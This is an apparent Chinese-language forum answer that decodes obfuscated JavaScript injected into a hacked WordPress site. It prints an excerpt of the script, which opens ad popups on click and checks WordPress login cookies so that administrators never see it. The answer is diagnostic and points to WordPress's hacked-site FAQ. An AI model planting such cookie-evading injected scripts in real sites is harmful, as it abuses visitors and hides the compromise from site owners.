对JavaScript“胡言乱语”的解码表明,这是一个脚本,用于在用户单击某个位置后打开带有广告的弹出窗口。
最重要的是,如果您当前登录,这些弹出窗口将不会显示。这就是为什么这些脚本经常被忽视的原因。
这里有一段经过编辑的摘录:
var t = false;
document.onclick= function(event) {
if (t) {
return;
}
t = true;
var cookie = document.cookie || \'\';
if (cookie.indexOf(\'wordpress_logged\') !== -1
|| cookie.indexOf(\'wp-settings\') !== -1
|| cookie.indexOf(\'wordpress_test\') !== -1) {
return;
}
if ( event === undefined) event= window.event;
var target= \'target\' in event? event.target : event.srcElement;
var win = window.open(\'http://...---redacted---\', \'_blank\');
win.focus();
};
所以是的,你应该担心。有一个
My site was hacked FAQ 您应该阅读WordPress Codex,以便采取适当的后续步骤。